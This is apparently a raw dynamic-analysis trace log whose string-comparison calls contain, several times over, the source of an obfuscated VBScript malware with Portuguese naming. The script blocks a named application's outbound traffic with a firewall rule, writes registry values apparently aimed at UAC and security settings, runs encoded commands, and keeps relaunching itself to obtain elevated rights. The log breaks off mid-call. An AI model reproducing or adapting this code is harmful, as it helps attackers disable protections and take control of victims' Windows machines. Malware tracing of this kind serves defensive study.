CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.313] wcsncmp (_String1="1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.314] wcsncmp (_String1=")-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.314] wcsncmp (_String1="-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0226.314] wcsncmp (_String1="2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, 